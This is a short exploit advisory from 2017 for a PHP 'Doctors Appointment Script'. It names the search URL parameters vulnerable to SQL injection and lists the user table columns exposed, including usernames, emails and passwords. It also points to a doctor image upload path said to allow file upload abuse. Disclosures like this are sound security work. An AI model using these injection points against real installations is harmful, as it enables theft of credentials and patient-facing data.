28 lines
No EOL
768 B
Text
28 lines
No EOL
768 B
Text
# # # # #
|
|
# Exploit Title: Doctors Appointment Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 05.04.2017
|
|
# Vendor Homepage: http://appointment-script.com/
|
|
# Software: http://appointment-script.com/demo
|
|
# Demo: http://appointment-script.com/demo
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL]
|
|
# user
|
|
# id
|
|
# first_name
|
|
# last_name
|
|
# username
|
|
# email
|
|
# password
|
|
# user_level_id
|
|
# Doctor profile images file upload vulnerability available.
|
|
# http://localhost/[PATH]/images/doctor_image/...
|
|
# # # # # |